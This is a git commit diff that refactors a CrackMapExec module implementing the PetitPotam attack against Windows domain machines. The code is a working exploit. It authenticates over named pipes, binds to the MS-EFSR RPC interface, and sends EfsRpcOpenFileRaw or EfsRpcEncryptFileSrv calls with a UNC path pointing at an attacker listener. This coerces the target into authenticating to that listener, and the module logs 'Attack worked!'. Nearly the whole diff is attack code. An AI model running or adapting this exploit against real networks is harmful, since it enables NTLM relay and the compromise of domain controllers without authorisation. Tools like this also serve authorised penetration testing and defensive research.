fix(petitpotam): move unneeded class to functions, which also fixes an error when calling

main
Marshall Hallenbeck 2023-03-24 16:35:40 -04:00
parent 67d0d20dcc
commit e7a7476c64
1 changed files with 101 additions and 95 deletions

View File

@ -5,6 +5,8 @@
# Module by @mpgn_x64
import logging
import sys
from impacket import system_errors
from impacket.dcerpc.v5 import transport
from impacket.dcerpc.v5.ndr import NDRCALL, NDRSTRUCT
@ -28,15 +30,25 @@ class CMEModule:
'''
self.listener = "127.0.0.1"
if 'LISTENER' in module_options:
self.listener = module_options['LISTENER']
self.listener = module_options['LISTENER']
self.pipe = "lsarpc"
if 'PIPE' in module_options:
self.pipe = module_options['PIPE']
self.pipe = module_options['PIPE']
def on_login(self, context, connection):
plop = CoerceAuth()
dce = plop.connect(connection.username, password=connection.password, domain=connection.domain, lmhash=connection.lmhash, nthash=connection.nthash, target=connection.host, pipe=self.pipe, targetIp=connection.host, doKerberos=connection.kerberos, dcHost=connection.kdcHost)
if plop.EfsRpcOpenFileRaw(dce, self.listener):
dce = coerce(
connection.username,
password=connection.password,
domain=connection.domain,
lmhash=connection.lmhash,
nthash=connection.nthash,
target=connection.host,
pipe=self.pipe,
do_kerberos=connection.kerberos,
dc_host=connection.kdcHost,
target_ip=connection.host
)
if efs_rpc_open_file_raw(dce, self.listener):
context.log.highlight("VULNERABLE")
context.log.highlight("Next step: https://github.com/topotam/PetitPotam")
try:
@ -109,6 +121,7 @@ class ENCRYPTION_CERTIFICATE_HASH(NDRSTRUCT):
('Display', LPWSTR),
)
class ENCRYPTION_CERTIFICATE(NDRSTRUCT):
structure = (
('Lenght', DWORD),
@ -135,13 +148,6 @@ class ENCRYPTED_FILE_METADATA_SIGNATURE(NDRSTRUCT):
)
class EFS_RPC_BLOB(NDRSTRUCT):
structure = (
('Data', DWORD),
('cbData', PCHAR),
)
class ENCRYPTION_CERTIFICATE_LIST(NDRSTRUCT):
align = 1
structure = (
@ -179,90 +185,90 @@ class EfsRpcEncryptFileSrvResponse(NDRCALL):
('ErrorCode', ULONG),
)
class CoerceAuth:
def connect(self, username, password, domain, lmhash, nthash, target, pipe, targetIp, doKerberos, dcHost):
binding_params = {
'lsarpc': {
'stringBinding': r'ncacn_np:%s[\PIPE\lsarpc]' % target,
'MSRPC_UUID_EFSR': ('c681d488-d850-11d0-8c52-00c04fd90f7e', '1.0')
},
'efsr': {
'stringBinding': r'ncacn_np:%s[\PIPE\efsrpc]' % target,
'MSRPC_UUID_EFSR': ('df1941c5-fe89-4e79-bf10-463657acf44d', '1.0')
},
'samr': {
'stringBinding': r'ncacn_np:%s[\PIPE\samr]' % target,
'MSRPC_UUID_EFSR': ('c681d488-d850-11d0-8c52-00c04fd90f7e', '1.0')
},
'lsass': {
'stringBinding': r'ncacn_np:%s[\PIPE\lsass]' % target,
'MSRPC_UUID_EFSR': ('c681d488-d850-11d0-8c52-00c04fd90f7e', '1.0')
},
'netlogon': {
'stringBinding': r'ncacn_np:%s[\PIPE\netlogon]' % target,
'MSRPC_UUID_EFSR': ('c681d488-d850-11d0-8c52-00c04fd90f7e', '1.0')
},
}
rpctransport = transport.DCERPCTransportFactory(binding_params[pipe]['stringBinding'])
if hasattr(rpctransport, 'set_credentials'):
rpctransport.set_credentials(username=username, password=password, domain=domain, lmhash=lmhash, nthash=nthash)
if targetIp:
rpctransport.setRemoteHost(targetIp)
def coerce(username, password, domain, lmhash, nthash, target, pipe, do_kerberos, dc_host, target_ip=None):
binding_params = {
'lsarpc': {
'stringBinding': r'ncacn_np:%s[\PIPE\lsarpc]' % target,
'MSRPC_UUID_EFSR': ('c681d488-d850-11d0-8c52-00c04fd90f7e', '1.0')
},
'efsr': {
'stringBinding': r'ncacn_np:%s[\PIPE\efsrpc]' % target,
'MSRPC_UUID_EFSR': ('df1941c5-fe89-4e79-bf10-463657acf44d', '1.0')
},
'samr': {
'stringBinding': r'ncacn_np:%s[\PIPE\samr]' % target,
'MSRPC_UUID_EFSR': ('c681d488-d850-11d0-8c52-00c04fd90f7e', '1.0')
},
'lsass': {
'stringBinding': r'ncacn_np:%s[\PIPE\lsass]' % target,
'MSRPC_UUID_EFSR': ('c681d488-d850-11d0-8c52-00c04fd90f7e', '1.0')
},
'netlogon': {
'stringBinding': r'ncacn_np:%s[\PIPE\netlogon]' % target,
'MSRPC_UUID_EFSR': ('c681d488-d850-11d0-8c52-00c04fd90f7e', '1.0')
},
}
rpc_transport = transport.DCERPCTransportFactory(binding_params[pipe]['stringBinding'])
if hasattr(rpc_transport, 'set_credentials'):
rpc_transport.set_credentials(username=username, password=password, domain=domain, lmhash=lmhash, nthash=nthash)
dce = rpctransport.get_dce_rpc()
dce.set_auth_type(RPC_C_AUTHN_WINNT)
dce.set_auth_level(RPC_C_AUTHN_LEVEL_PKT_PRIVACY)
if target_ip:
rpc_transport.setRemoteHost(target_ip)
if doKerberos:
rpctransport.set_kerberos(doKerberos, kdcHost=dcHost)
dce.set_auth_type(RPC_C_AUTHN_GSS_NEGOTIATE)
dce = rpc_transport.get_dce_rpc()
dce.set_auth_type(RPC_C_AUTHN_WINNT)
dce.set_auth_level(RPC_C_AUTHN_LEVEL_PKT_PRIVACY)
logging.debug("[-] Connecting to %s" % binding_params[pipe]['stringBinding'])
try:
dce.connect()
except Exception as e:
logging.debug("Something went wrong, check error status => %s" % str(e))
sys.exit()
logging.debug("[+] Connected!")
logging.debug("[+] Binding to %s" % binding_params[pipe]['MSRPC_UUID_EFSR'][0])
try:
dce.bind(uuidtup_to_bin(binding_params[pipe]['MSRPC_UUID_EFSR']))
except Exception as e:
logging.debug("Something went wrong, check error status => %s" % str(e))
sys.exit()
logging.debug("[+] Successfully bound!")
return dce
def EfsRpcOpenFileRaw(self, dce, listener):
logging.debug("[-] Sending EfsRpcOpenFileRaw!")
try:
request = EfsRpcOpenFileRaw()
request['fileName'] = '\\\\%s\\test\\Settings.ini\x00' % listener
request['Flag'] = 0
#request.dump()
resp = dce.request(request)
except Exception as e:
if str(e).find('ERROR_BAD_NETPATH') >= 0:
logging.debug('[+] Got expected ERROR_BAD_NETPATH exception!!')
logging.debug('[+] Attack worked!')
return True
if str(e).find('rpc_s_access_denied') >= 0:
logging.debug('[-] Got RPC_ACCESS_DENIED!! EfsRpcOpenFileRaw is probably PATCHED!')
logging.debug('[+] OK! Using unpatched function!')
logging.debug("[-] Sending EfsRpcEncryptFileSrv!")
try:
request = EfsRpcEncryptFileSrv()
request['FileName'] = '\\\\%s\\test\\Settings.ini\x00' % listener
resp = dce.request(request)
except Exception as e:
if str(e).find('ERROR_BAD_NETPATH') >= 0:
logging.debug('[+] Got expected ERROR_BAD_NETPATH exception!!')
logging.debug('[+] Attack worked!')
return True
else:
logging.debug("Something went wrong, check error status => %s" % str(e))
else:
logging.debug("Something went wrong, check error status => %s" % str(e))
if do_kerberos:
rpc_transport.set_kerberos(do_kerberos, kdcHost=dc_host)
dce.set_auth_type(RPC_C_AUTHN_GSS_NEGOTIATE)
logging.debug("[-] Connecting to %s" % binding_params[pipe]['stringBinding'])
try:
dce.connect()
except Exception as e:
logging.debug("Something went wrong, check error status => %s" % str(e))
sys.exit()
logging.debug("[+] Connected!")
logging.debug("[+] Binding to %s" % binding_params[pipe]['MSRPC_UUID_EFSR'][0])
try:
dce.bind(uuidtup_to_bin(binding_params[pipe]['MSRPC_UUID_EFSR']))
except Exception as e:
logging.debug("Something went wrong, check error status => %s" % str(e))
sys.exit()
logging.debug("[+] Successfully bound!")
return dce
def efs_rpc_open_file_raw(dce, listener):
logging.debug("[-] Sending EfsRpcOpenFileRaw!")
try:
request = EfsRpcOpenFileRaw()
request['fileName'] = '\\\\%s\\test\\Settings.ini\x00' % listener
request['Flag'] = 0
resp = dce.request(request)
except Exception as e:
if str(e).find('ERROR_BAD_NETPATH') >= 0:
logging.debug('[+] Got expected ERROR_BAD_NETPATH exception!!')
logging.debug('[+] Attack worked!')
return True
if str(e).find('rpc_s_access_denied') >= 0:
logging.debug('[-] Got RPC_ACCESS_DENIED!! EfsRpcOpenFileRaw is probably PATCHED!')
logging.debug('[+] OK! Using unpatched function!')
logging.debug("[-] Sending EfsRpcEncryptFileSrv!")
try:
request = EfsRpcEncryptFileSrv()
request['FileName'] = '\\\\%s\\test\\Settings.ini\x00' % listener
resp = dce.request(request)
except Exception as e:
if str(e).find('ERROR_BAD_NETPATH') >= 0:
logging.debug('[+] Got expected ERROR_BAD_NETPATH exception!!')
logging.debug('[+] Attack worked!')
return True
else:
logging.debug("Something went wrong, check error status => %s" % str(e))
else:
logging.debug("Something went wrong, check error status => %s" % str(e))